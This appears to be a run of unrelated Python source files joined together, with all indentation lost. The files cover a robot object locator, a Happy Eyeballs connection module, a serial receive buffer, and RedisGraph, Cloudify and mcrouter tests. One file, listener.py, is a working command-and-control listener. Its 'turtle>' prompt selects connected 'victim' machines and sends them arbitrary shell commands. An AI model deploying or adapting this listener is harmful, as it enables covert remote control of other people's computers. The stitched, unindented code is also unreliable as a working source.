cal_30 = ((xx-x1) * (y2-y1)) - ((yy-y1) * (x2-x1))
if cal_30 > 0:
return "右手邊"
else:
cal_60 = ((xx-x1) * (y3-y1)) - ((yy-y1) * (x3-x1))
if cal_60 > 0:
return "右前方"
else:
return "前方"
elif xx <= 320:
x1, y1 = 320, -480
x2, y2 = 0, -295
x3, y3 = 43, 0
cal_30 = ((xx-x1) * (y2-y1)) - ((yy-y1) * (x2-x1))
if cal_30 <= 0:
return "左手邊"
else:
cal_60 = ((xx-x1) * (y3-y1)) - ((yy-y1) * (x3-x1))
if cal_60 > 0:
return "前方"
else:
return "左前方"
def distance(self, x1, y1, x2, y2):
x1, y1, x2, y2 = float(x1), float(y1), float(x2), float(y2)
xdis = x1 - x2
ydis = y1 - y2
real_xdis = xdis * (sx1 + sx2)
real_ydis = ydis * (sy1 + sy2)
tot_dis = pow((pow(real_xdis, 2) + pow(real_ydis, 2)), 0.5)
return int(tot_dis)
def translateEtoC(self, s):
if s == 'box':
return '箱子'
elif s == 'chair':
return '椅子'
elif s == 'dehumidifier':
return '除溼機'
elif s == 'diningtable':
return '桌子'
elif s == 'fan':
return '電風扇'
elif s == 'mug':
return '杯子'
elif s == 'person':
return '人'
elif s == 'sun glasses':
return '墨鏡'
elif s == 'sweepingrobot':
return '掃地機器人'
else:
return s
def translateCtoE(self, s):
if s == '電風扇' or s == '電扇':
return 'fan'
elif s == '椅子':
return 'chair'
elif s == '桌子':
return 'diningtable'
elif s == '箱子':
return 'box'
elif s == '除溼機':
return 'dehumidifier'
elif s == '掃地機器人':
return 'sweepingrobot'
elif s == '人':
return 'person'
elif s == '墨鏡':
return 'sun glasses'
elif s == '杯子':
return 'mug'
else:
return s
def validCommand(self, s): # check if the input commands are valid
if s[-6:] == '有沒有移動過':
self.obj = s[:len(s)-6]
self.obj = self.translateCtoE(self.obj)
return 1
elif s[-3:] == '在哪裡':
self.obj = s[:len(s)-3]
self.obj = self.translateCtoE(self.obj)
return 2
elif s == '記錄家具位置':
return 3
elif s[0:3] == '我想找':
self.obj = s[3:]
self.obj = self.translateCtoE(self.obj)
return 4
else:
return 0
def isMoved(self, s, before_pos, result_list):
before = []
after = []
for bp in before_pos:
if bp[0] == self.obj:
before = [bp[1], bp[2]]
break
for index, rl in enumerate(result_list):
if rl == self.obj:
after = [result_list[index+1], result_list[index+2]]
break
if before == [] or after == []: # object not detected
return 1
elif abs(float(before[0]) - float(after[0])) > 30 or abs(float(before[1]) - float(after[1])) > 30: # moved
return 2
else: # not moved
return 3
class Socket:
def __init__(self):
self.sock = None
Server_GUI.iscreate1 = True
def create(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((TCP_IP, TCP_PORT))
print('host and port: ', TCP_IP, TCP_PORT)
self.sock.listen(5)
count = 0
print('Waiting for connection...')
while True:
self.s, addr = self.sock.accept()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Connection address:', addr)
receive = ReceiveThread(self.s, count)
receive.start()
count += 1
def ssend(self):
print('> ' + send_msg, end = '')
self.s.send(send_msg.encode('utf-8'))
|
happyeyeballs.py
|
#!/usr/bin/env python
# Python implementation of RFC 6555 / Happy Eyeballs: find the quickest IPv4/IPv6 connection
# See https://tools.ietf.org/html/rfc6555
# Method: start parallel connection attempts in threads, and only wait for the quickest successful socket connect
# If the HOST has an IPv6 address, IPv6 is given a head start by delaying IPv4. See https://tools.ietf.org/html/rfc6555#section-4.1
# You can run this as a standalone program, or as a module:
'''
from happyeyeballs import happyeyeballs
print happyeyeballs('newszilla.xs4all.nl', port=119)
'''
# or with more logging:
'''
from happyeyeballs import happyeyeballs
import logging
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
print happyeyeballs('newszilla.xs4all.nl', port=119)
'''
import socket
import ssl
import Queue
import threading
import time
import logging
DEBUG = False
# called by each thread
def do_socket_connect(queue, ip, PORT, SSL, ipv4delay):
# connect to the ip, and put the result into the queue
if DEBUG: logging.debug("Input for thread is %s %s %s", ip, PORT, SSL)
try:
# CREATE SOCKET
if ip.find(':') >= 0:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
if ip.find('.') >= 0:
time.sleep(ipv4delay) # IPv4 ... so a delay for IPv4 as we prefer IPv6. Note: ipv4delay could be 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
if not SSL:
# Connect ...
s.connect((ip, PORT))
# ... and close
s.close()
else:
# WRAP SOCKET
wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
# CONNECT
wrappedSocket.connect((ip, PORT))
# CLOSE SOCKET CONNECTION
wrappedSocket.close()
queue.put((ip, True))
if DEBUG: logging.debug("connect to %s OK", ip)
except:
queue.put((ip, False))
if DEBUG: logging.debug("connect to %s not OK", ip)
pass
def happyeyeballs(HOST, **kwargs):
# Happyeyeballs function, with caching of the results
# Fill out the parameters into the variables
try:
PORT = kwargs['port']
except:
PORT = 80
try:
SSL = kwargs['ssl']
except:
SSL = False
try:
preferipv6 = kwargs['preferipv6']
except:
preferipv6 = True # prefer IPv6, so give IPv6 connects a head start by delaying IPv4
# Find out if a cached result is available, and recent enough:
timecurrent = int(time.time()) # current time in seconds since epoch
retentionseconds = 100
hostkey = (HOST, PORT, SSL, preferipv6) # Example key: (u'ssl.astraweb.com', 563, True, True)
try:
happyeyeballs.happylist[hostkey] # just to check: does it exist?
# No exception, so entry exists, so let's check the time:
timecached = happyeyeballs.happylist[hostkey][1]
if timecurrent - timecached <= retentionseconds:
if DEBUG: logging.debug("existing cached result recent enough")
return happyeyeballs.happylist[hostkey][0]
else:
if DEBUG: logging.debug("existing cached result too old. Find a new one")
# Continue a few lines down
except:
# Exception, so entry not there, so we have to fill it out
if DEBUG: logging.debug("Host not yet in the cache. Find entry")
pass
# we only arrive here if the entry has to be determined. So let's do that:
# We have to determine the (new) best IP address
start = time.clock()
if DEBUG: logging.debug("\n\n%s %s %s %s", HOST, PORT, SSL, preferipv6)
ipv4delay = 0
try:
# Check if there is an AAAA / IPv6 result for this host:
info = socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
if DEBUG: logging.debug("IPv6 address found for %s", HOST)
if preferipv6:
ipv4delay=0.1 # preferipv6, AND at least one IPv6 found, so give IPv4 (!) a delay so that IPv6 has a head start and is preferred
except:
if DEBUG: logging.debug("No IPv6 address found for %s", HOST)
myqueue = Queue.Queue() # queue used for threads giving back the results
try:
# Get all IP (IPv4 and IPv6) addresses:
allinfo = socket.getaddrinfo(HOST, PORT, 0, 0, socket.IPPROTO_TCP)
for info in allinfo:
address = info[4][0]
thisthread = threading.Thread(target=do_socket_connect, args=(myqueue, address, PORT, SSL, ipv4delay))
thisthread.daemon = True
thisthread.start()
result = None # default return value, used if none of threads says True/"OK", so no connect on any IP address
# start reading from the Queue for message from the threads:
for i in range(len(allinfo)):
s = myqueue.get() # get a response
if s[1] == True:
result = s[0]
break # the first True/"OK" is enough, so break out of for loop
except:
if DEBUG: logging.debug("something went wrong in the try block")
result = None
logging.info("Quickest IP address for %s (port %s, ssl %s, preferipv6 %s) is %s", HOST, PORT, SSL, preferipv6, result)
delay = int(1000 * (time.clock() - start))
logging.debug("Happy Eyeballs lookup and port connect took %s ms", delay)
# We're done. Store and return the result
if result:
happyeyeballs.happylist[hostkey] = ( result, timecurrent )
if DEBUG: logging.debug("Determined new result for %s with result %s", (hostkey, happyeyeballs.happylist[hostkey]) )
return result
happyeyeballs.happylist = {} # The cached results. This static variable must be after the def happyeyeballs()
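# Illustrative helper (not part of the original module): warm the per-host cache
# for a list of (host, port) pairs up front so that the first real connection
# does not pay the probing cost.  It only uses the happyeyeballs() call defined
# above; the function name and signature are assumptions.
def prewarm_cache(endpoints, use_ssl=False):
    results = {}
    for host, port in endpoints:
        # each call is cached under the (host, port, ssl, preferipv6) key
        results[(host, port)] = happyeyeballs(host, port=port, ssl=use_ssl)
    return results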
if __name__ == '__main__':
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
if DEBUG: logger.setLevel(logging.DEBUG)
# plain HTTP/HTTPS sites:
print happyeyeballs('www.google.com')
print happyeyeballs('www.google.com', port=443, ssl=True)
print happyeyeballs('www.nu.nl')
# newsservers:
print happyeyeballs('newszilla6.xs4all.nl', port=119)
print happyeyeballs('newszilla.xs4all.nl', port=119)
print happyeyeballs('block.cheapnews.eu', port=119)
print happyeyeballs('block.cheapnews.eu', port=443, ssl=True)
print happyeyeballs('sslreader.eweka.nl', port=563, ssl=True)
print happyeyeballs('news.thundernews.com', port=119)
print happyeyeballs('news.thundernews.com', port=119, preferipv6=False)
print happyeyeballs('secure.eu.thundernews.com', port=563, ssl=True)
# Strange cases
print happyeyeballs('does.not.resolve', port=443, ssl=True)
print happyeyeballs('www.google.com', port=119)
print happyeyeballs('216.58.211.164')
|
listener.py
|
import socket, signal
import sys, os
import threading
import time
from queue import Queue
def listener():
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_address = []
def controlc_signal(signal,frame):
quit_gracefully(signal=None, frame=None)
def register_signal_handler():
signal.signal(signal.SIGINT, quit_gracefully)
signal.signal(signal.SIGTERM, quit_gracefully)
return
def quit_gracefully(signal=None, frame=None):
#print('\nQuitting gracefully')
for conn in all_connections:
try:
conn.shutdown(2)
conn.close()
except Exception as e:
print('Could not close connection %s' % str(e))
continue  # keep trying to close the remaining connections
s.close()
sys.exit(0)
# Create a Socket ( connect two computers)
signal.signal(signal.SIGINT,controlc_signal)
def create_socket():
try:
global host
global port
global s
host = ""
try:
port = int(input("Port >> "))
except:
print ("Wrong !!! ")
print ("quitting....")
quit_gracefully(signal=None, frame=None)
s = socket.socket()
except socket.error as msg:
print("Socket creation error: " + str(msg))
# Binding the socket and listening for connections
def bind_socket():
try:
global host
global port
global s
print("Binding the Port: " + str(port))
try:
s.bind((host, port))
except:
print ("Port : %s already in use"%port)
return 1
s.listen(5)
except socket.error as msg:
print("Socket Binding error" + str(msg) + "\n" + "Retrying...")
bind_socket()
# Handling connection from multiple clients and saving to a list
# Closing previous connections when server.py file is restarted
def accepting_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_address[:]
while True:
try:
conn, address = s.accept()
s.setblocking(True)  # blocking mode: accept()/recv() wait instead of raising a timeout
all_connections.append(conn)
all_address.append(address)
print("Connection has been established :" + address[0])
except:
#print("Error accepting connections")
break
# 2nd thread functions - 1) See all the clients 2) Select a client 3) Send commands to the connected client
# Interactive prompt for sending commands
# turtle> list
# 0 Friend-A Port
# 1 Friend-B Port
# 2 Friend-C Port
# turtle> select 1
# 192.168.0.112> dir
def start_turtle():
while True:
cmd = input('turtle> ')
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
elif cmd == 'help':
print('''
help show this command
list show Target list
select select Target such as > select 0
''')
elif cmd == '':
pass
elif cmd == 'exit' or cmd == 'quit':
queue.task_done()
queue.task_done()
print('Server shutdown')
#break
quit_gracefully()
else:
print("Command not recognized")
# Display all current active connections with client
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(' '))
conn.recv(20480)
except:
del all_connections[i]
del all_address[i]
continue
results += str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
print("----Clients----" + "\n" + results)
# Selecting the target
def get_target(cmd):
try:
target = cmd.replace('select ', '') # target = id
target = int(target)
conn = all_connections[target]
print("You are now connected to :" + str(all_address[target][0]))
print(str(all_address[target][0]) + ">", end="")
return conn
# 192.168.0.4> dir
except:
print("Selection not valid")
return None
# Send commands to client/victim or a friend
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == 'quit' or cmd == 'exit':
break
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = str(conn.recv(20480), "utf-8")
print(client_response, end="")
except:
print("Error sending commands")
break
# Create worker threads
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do next job that is in the queue (handle connections, send commands)
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
accepting_connections()
break
if x == 2:
start_turtle()
queue.task_done()
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_workers()
create_jobs()
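# Minimal usage sketch (assumption: this file is saved/imported as "listener"):
# calling listener() starts the two worker threads, prompts for a port on stdin,
# binds and listens on it, and then blocks in queue.join() until 'exit'/'quit'
# is typed at the turtle prompt or Ctrl-C is pressed.
#
#   if __name__ == '__main__':
#       listener()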
|
enlaceRx.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#####################################################
# Physical Layer of Computing (Camada Física da Computação)
# Carareto
# 17/02/2018
# Link Layer (Camada de Enlace)
####################################################
# Import the time package
import time
# Threads
import threading
# Class
class RX(object):
def __init__(self, fisica):
self.fisica = fisica
self.buffer = bytes(bytearray())
self.threadStop = False  # set to True to terminate the reader thread
self.threadMutex = True  # pause flag: when False the reader thread skips reads (not a real mutex)
self.READLEN = 1024      # maximum number of bytes requested per read
def thread(self):
while not self.threadStop:
if self.threadMutex:
rxTemp, nRx = self.fisica.read(self.READLEN)
if (nRx > 0):
self.buffer += rxTemp
time.sleep(0.01)
def threadStart(self):
self.thread = threading.Thread(target=self.thread, args=())
self.thread.start()
def threadKill(self):
self.threadStop = True
def threadPause(self):
self.threadMutex = False
def threadResume(self):
self.threadMutex = True
def getIsEmpty(self):
return self.getBufferLen() == 0
def getBufferLen(self):
return(len(self.buffer))
def getAllBuffer(self, length=None):
# "length" is accepted for call compatibility but ignored; the whole buffer is returned
self.threadPause()
b = self.buffer[:]
self.clearBuffer()
self.threadResume()
return(b)
def getBuffer(self, nData):
self.threadPause()
b = self.buffer[0:nData]
self.buffer = self.buffer[nData:]
self.threadResume()
return(b)
def getNData(self, size):
inactive = 0
last_buffer = self.buffer
while(self.getBufferLen() < size):
# print(inactive)
if self.buffer == last_buffer:
inactive += 1
else:
inactive = 0
if inactive >= 100:
return(0, [])
time.sleep(0.05)
return(1, self.getBuffer(size))
def clearBuffer(self):
self.buffer = b""
|
test_concurrent_query.py
|
import os
import sys
import unittest
import threading
from redisgraph import Graph, Node, Edge
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from disposableredis import DisposableRedis
from base import FlowTestsBase
GRAPH_ID = "G" # Graph identifier.
CLIENT_COUNT = 16 # Number of concurrent connections.
graphs = None # One graph object per client.
assertions = [True] * CLIENT_COUNT # Each thread places its verdict at position threadID.
people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"]
def redis():
return DisposableRedis(loadmodule=os.path.dirname(os.path.abspath(__file__)) + '/../../src/redisgraph.so')
def query_aggregate(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
person_count = actual_result.result_set[0][0]
if person_count != len(people):
assertions[threadID] = False
break
def query_neighbors(graph, query, threadID):
global assertions
assertions[threadID] = True
# Fully connected graph: every person knows every other person.
expected_resultset_size = len(people) * (len(people)-1)
for i in range(10):
actual_result = graph.query(query)
if len(actual_result.result_set) != expected_resultset_size:
assertions[threadID] = False
break
def query_write(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
if actual_result.nodes_created != 1 or actual_result.properties_set != 1:
assertions[threadID] = False
break
def delete_graph(graph, threadID):
global assertions
assertions[threadID] = True
# Try to delete graph.
try:
graph.delete()
except:
# Graph deletion failed.
assertions[threadID] = False
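# The workers record their verdicts in assertions[threadID] instead of asserting
# directly: an assertion raised inside a worker thread would not fail the test,
# so the main thread joins the workers and then asserts on the collected flags.
# Writing to distinct list slots from different threads needs no extra locking here.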
class ConcurrentQueryFlowTest(FlowTestsBase):
@classmethod
def setUpClass(cls):
global graphs
graphs = []
print "ConcurrentQueryFlowTest"
cls.r = redis()
cls.r.start()
for i in range(0, CLIENT_COUNT):
conn = cls.r.client()
graphs.append(Graph(GRAPH_ID, conn))
cls.populate_graph()
@classmethod
def tearDownClass(cls):
cls.r.stop()
@classmethod
def populate_graph(cls):
nodes = {}
graph = graphs[0]
# Create entities
for p in people:
node = Node(label="person", properties={"name": p})
graph.add_node(node)
nodes[p] = node
# Fully connected graph
for src in nodes:
for dest in nodes:
if src != dest:
edge = Edge(nodes[src], "know", nodes[dest])
graph.add_edge(edge)
graph.commit()
# Count number of nodes in the graph
def test01_concurrent_aggregation(self):
q = """MATCH (p:person) RETURN count(p)"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_aggregate, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
assert(assertions[i])
# Concurrently get neighbors of every node.
def test02_retrieve_neighbors(self):
q = """MATCH (p:person)-[know]->(n:person) RETURN n.name"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_neighbors, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
assert(assertions[i])
# Concurrent writes
def test_03_concurrent_write(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
q = """CREATE (c:country {id:"%d"})""" % i
t = threading.Thread(target=query_write, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
assert(assertions[i])
# Try to delete graph multiple times.
def test_04_concurrent_delete(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=delete_graph, args=(graph, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
# Exactly one thread should have successfully deleted the graph.
assert(assertions.count(True) == 1)
if __name__ == '__main__':
unittest.main()
|
test_proxy.py
|
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
import threading
import time
import sys
import subprocess
from StringIO import StringIO
import testtools
from pytest import mark
from cloudify.mocks import MockCloudifyContext
from cloudify.proxy import client
from cloudify.proxy.server import (UnixCtxProxy,
TCPCtxProxy,
HTTPCtxProxy,
PathDictAccess)
IS_WINDOWS = os.name == 'nt'
class CtxProxyTestBase(object):
class StubAttribute(object):
some_property = 'some_value'
@staticmethod
def stub_method(*args):
return args
@staticmethod
def stub_sleep(seconds):
time.sleep(float(seconds))
@staticmethod
def stub_args(arg1, arg2, arg3='arg3', arg4='arg4', *args, **kwargs):
return dict(
arg1=arg1,
arg2=arg2,
arg3=arg3,
arg4=arg4,
args=args,
kwargs=kwargs)
def setUp(self, proxy_server_class):
super(CtxProxyTestBase, self).setUp()
self.ctx = MockCloudifyContext(node_id='instance_id', properties={
'prop1': 'value1',
'prop2': {
'nested_prop1': 'nested_value1'
},
'prop3': [
{'index': 0, 'value': 'value_0'},
{'index': 1, 'value': 'value_1'},
{'index': 2, 'value': 'value_2'}
],
'prop4': {
'key': 'value'
}
})
self.ctx.stub_method = self.stub_method
self.ctx.stub_sleep = self.stub_sleep
self.ctx.stub_args = self.stub_args
self.ctx.stub_attr = self.StubAttribute()
self.server = proxy_server_class(self.ctx)
self.start_server()
def start_server(self):
self.stop_server = False
self.server_stopped = False
def serve():
while not self.stop_server:
self.server.poll_and_process(timeout=0.1)
self.server.close()
self.server_stopped = True
self.server_thread = threading.Thread(target=serve)
self.server_thread.daemon = True
self.server_thread.start()
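# The serve loop polls with a 0.1 s timeout so that stop_server_now() can flip
# stop_server and have the thread notice it promptly, close the proxy server,
# and mark server_stopped before tearDown returns.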
def stop_server_now(self):
self.stop_server = True
while not self.server_stopped:
time.sleep(0.1)
def tearDown(self):
super(CtxProxyTestBase, self).tearDown()
self.stop_server_now()
def request(self, *args):
return client.client_req(self.server.socket_url, args)
def test_attribute_access(self):
response = self.request('stub_attr', 'some_property')
self.assertEqual(response, 'some_value')
def test_sugared_attribute_access(self):
response = self.request('stub-attr', 'some-property')
self.assertEqual(response, 'some_value')
def test_dict_prop_access_get_key(self):
response = self.request('node', 'properties', 'prop1')
self.assertEqual(response, 'value1')
def test_dict_prop_access_get_key_nested(self):
response = self.request('node', 'properties', 'prop2.nested_prop1')
self.assertEqual(response, 'nested_value1')
def test_dict_prop_access_get_with_list_index(self):
response = self.request('node', 'properties', 'prop3[2].value')
self.assertEqual(response, 'value_2')
def test_dict_prop_access_set(self):
self.request('node', 'properties', 'prop4.key', 'new_value')
self.request('node', 'properties', 'prop3[2].value', 'new_value_2')
self.request('node', 'properties', 'prop4.some.new.path',
'some_new_value')
self.assertEqual(self.ctx.node.properties['prop4']['key'], 'new_value')
self.assertEqual(
self.ctx.node.properties['prop3'][2]['value'],
'new_value_2')
self.assertEqual(
self.ctx.node.properties['prop4']['some']['new']['path'],
'some_new_value')
def test_method_invocation(self):
args = ['arg1', 'arg2', 'arg3']
response_args = self.request('stub-method', *args)
self.assertEqual(args, response_args)
def test_method_invocation_no_args(self):
response = self.request('stub-method')
self.assertEqual([], response)
def test_method_invocation_kwargs(self):
arg1 = 'arg1'
arg2 = 'arg2'
arg4 = 'arg4_override'
arg5 = 'arg5'
kwargs = dict(
arg4=arg4,
arg5=arg5)
response = self.request('stub_args', arg1, arg2, kwargs)
self.assertEqual(response, dict(
arg1=arg1,
arg2=arg2,
arg3='arg3',
arg4=arg4,
args=[],
kwargs=dict(
arg5=arg5)))
def test_empty_return_value(self):
response = self.request('blueprint', 'id')
self.assertIsNone(response)
def test_client_request_timeout(self):
if hasattr(self, 'expected_exception'):
expected_exception = self.expected_exception
else:
expected_exception = RuntimeError
self.assertRaises(expected_exception,
client.client_req,
self.server.socket_url,
['stub-sleep', '0.5'],
0.1)
def test_processing_exception(self):
self.assertRaises(client.RequestError,
self.request, 'property_that_does_not_exist')
def test_not_json_serializable(self):
self.assertRaises(client.RequestError,
self.request, 'logger')
def test_no_string_arg(self):
args = ['stub_method', 1, 2]
response = self.request(*args)
self.assertEqual(args[1:], response)
@mark.skipif(IS_WINDOWS, reason='Test skipped on Windows')
class TestUnixCtxProxy(CtxProxyTestBase, testtools.TestCase):
def setUp(self):
super(TestUnixCtxProxy, self).setUp(UnixCtxProxy)
class TestTCPCtxProxy(CtxProxyTestBase, testtools.TestCase):
def setUp(self):
super(TestTCPCtxProxy, self).setUp(TCPCtxProxy)
class TestHTTPCtxProxy(CtxProxyTestBase, testtools.TestCase):
def setUp(self):
super(TestHTTPCtxProxy, self).setUp(HTTPCtxProxy)
def start_server(self):
pass
def stop_server_now(self):
self.server.close()
def test_client_request_timeout(self):
self.expected_exception = IOError
super(TestHTTPCtxProxy, self).test_client_request_timeout()
class TestArgumentParsing(testtools.TestCase):
def mock_client_req(self, socket_url, args, timeout):
self.assertEqual(socket_url, self.expected.get('socket_url'))
self.assertEqual(args, self.expected.get('args'))
self.assertEqual(timeout, int(self.expected.get('timeout')))
return self.mock_response
def setUp(self):
super(TestArgumentParsing, self).setUp()
self.original_client_req = client.client_req
client.client_req = self.mock_client_req
self.addCleanup(self.restore)
self.expected = dict(
args=[],
timeout=30,
socket_url='stub')
self.mock_response = None
os.environ['CTX_SOCKET_URL'] = 'stub'
def restore(self):
client.client_req = self.original_client_req
if 'CTX_SOCKET_URL' in os.environ:
del os.environ['CTX_SOCKET_URL']
def test_socket_url_arg(self):
self.expected.update(dict(
socket_url='sock_url'))
client.main(['--socket-url', self.expected.get('socket_url')])
def test_socket_url_env(self):
expected_socket_url = 'env_sock_url'
os.environ['CTX_SOCKET_URL'] = expected_socket_url
self.expected.update(dict(
socket_url=expected_socket_url))
client.main([])
def test_socket_url_missing(self):
del os.environ['CTX_SOCKET_URL']
self.assertRaises(RuntimeError,
client.main, [])
def test_args(self):
self.expected.update(dict(
args=['1', '2', '3']))
client.main(self.expected.get('args'))
def test_timeout(self):
self.expected.update(dict(
timeout='10'))
client.main(['--timeout', self.expected.get('timeout')])
self.expected.update(dict(
timeout='15'))
client.main(['-t', self.expected.get('timeout')])
def test_mixed_order(self):
self.expected.update(dict(
args=['1', '2', '3'],
timeout='20',
socket_url='mixed_socket_url'))
client.main(
['-t', self.expected.get('timeout')] +
['--socket-url', self.expected.get('socket_url')] +
self.expected.get('args'))
client.main(
['-t', self.expected.get('timeout')] +
self.expected.get('args') +
['--socket-url', self.expected.get('socket_url')])
client.main(
self.expected.get('args') +
['-t', self.expected.get('timeout')] +
['--socket-url', self.expected.get('socket_url')])
def test_json_args(self):
args = ['@1', '@[1,2,3]', '@{"key":"value"}']
expected_args = [1, [1, 2, 3], {'key': 'value'}]
self.expected.update(dict(
args=expected_args))
client.main(args)
def test_json_arg_prefix(self):
args = ['_1', '@1']
expected_args = [1, '@1']
self.expected.update(dict(
args=expected_args))
client.main(args + ['--json-arg-prefix', '_'])
def test_json_output(self):
self.assert_valid_output('string', 'string', '"string"')
self.assert_valid_output(1, '1', '1')
self.assert_valid_output([1, '2'], "[1, '2']", '[1, "2"]')
self.assert_valid_output({'key': 1},
"{'key': 1}",
'{"key": 1}')
self.assert_valid_output(False, '', 'false')
self.assert_valid_output(True, 'True', 'true')
self.assert_valid_output([], '', '[]')
self.assert_valid_output({}, '', '{}')
def assert_valid_output(self, response, ex_typed_output, ex_json_output):
self.mock_response = response
current_stdout = sys.stdout
def run(args, expected):
output = StringIO()
sys.stdout = output
client.main(args)
self.assertEqual(output.getvalue(), expected)
try:
run([], ex_typed_output)
run(['-j'], ex_json_output)
run(['--json-output'], ex_json_output)
finally:
sys.stdout = current_stdout
class TestCtxEntryPoint(testtools.TestCase):
def test_ctx_in_path(self):
subprocess.call(['ctx', '--help'])
class TestPathDictAccess(testtools.TestCase):
def test_simple_set(self):
obj = {}
path_dict = PathDictAccess(obj)
path_dict.set('foo', 42)
self.assertEqual(obj, {'foo': 42})
def test_nested_set(self):
obj = {'foo': {}}
path_dict = PathDictAccess(obj)
path_dict.set('foo.bar', 42)
self.assertEqual(obj, {'foo': {'bar': 42}})
def test_set_index(self):
obj = {'foo': [None, {'bar': 0}]}
path_dict = PathDictAccess(obj)
path_dict.set('foo[1].bar', 42)
self.assertEqual(obj, {'foo': [None, {'bar': 42}]})
def test_set_nonexistent_parent(self):
obj = {}
path_dict = PathDictAccess(obj)
path_dict.set('foo.bar', 42)
self.assertEqual(obj, {'foo': {'bar': 42}})
def test_set_nonexistent_parent_nested(self):
obj = {}
path_dict = PathDictAccess(obj)
path_dict.set('foo.bar.baz', 42)
self.assertEqual(obj, {'foo': {'bar': {'baz': 42}}})
def test_simple_get(self):
obj = {'foo': 42}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo')
self.assertEqual(result, 42)
def test_nested_get(self):
obj = {'foo': {'bar': 42}}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo.bar')
self.assertEqual(result, 42)
def test_nested_get_shadows_dotted_name(self):
obj = {'foo': {'bar': 42}, 'foo.bar': 58}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo.bar')
self.assertEqual(result, 42)
def test_index_get(self):
obj = {'foo': [0, 1]}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo[1]')
self.assertEqual(result, 1)
def test_get_nonexistent(self):
obj = {}
path_dict = PathDictAccess(obj)
self.assertRaises(RuntimeError, path_dict.get, 'foo')
def test_get_by_index_not_list(self):
obj = {'foo': {0: 'not-list'}}
path_dict = PathDictAccess(obj)
self.assertRaises(RuntimeError, path_dict.get, 'foo[0]')
def test_get_by_index_nonexistent_parent(self):
obj = {}
path_dict = PathDictAccess(obj)
self.assertRaises(RuntimeError, path_dict.get, 'foo[1]')
|
test_carbonlookaside_route.py
|
# Copyright (c) 2015-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the LICENSE
# file in the root directory of this source tree.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.McrouterTestCase import McrouterTestCase
import tempfile
import os
import time
from string import Template
import threading
import Queue
class CarbonLookasideTmpConfig():
routeConfigFile = """
{
"pools": {
"A": {
"servers": [ "127.0.0.1:12345" ]
}
},
"route": {
"type": "CarbonLookasideRoute",
"prefix": "$TEMPLATE_PREFIX",
"ttl": $TEMPLATE_TTL,
"flavor": "$TEMPLATE_FILENAME",
"lease_settings": {
"enable_leases": $TEMPLATE_LEASE_ENABLE,
"initial_wait_interval_ms": $TEMPLATE_LEASE_WAIT_INTERVAL,
"num_retries": $TEMPLATE_LEASE_NUM_RETRIES,
},
"child": [
"PoolRoute|A"
]
}
}
"""
routeLatencyConfigFile = """
{
"pools": {
"A": {
"servers": [ "127.0.0.1:12345" ]
}
},
"route": {
"type": "CarbonLookasideRoute",
"prefix": "$TEMPLATE_PREFIX",
"ttl": $TEMPLATE_TTL,
"flavor": "$TEMPLATE_FILENAME",
"lease_settings": {
"enable_leases": $TEMPLATE_LEASE_ENABLE,
"initial_wait_interval_ms": $TEMPLATE_LEASE_WAIT_INTERVAL,
"num_retries": $TEMPLATE_LEASE_NUM_RETRIES,
},
"child": {
"type": "LatencyInjectionRoute",
"child": "PoolRoute|A",
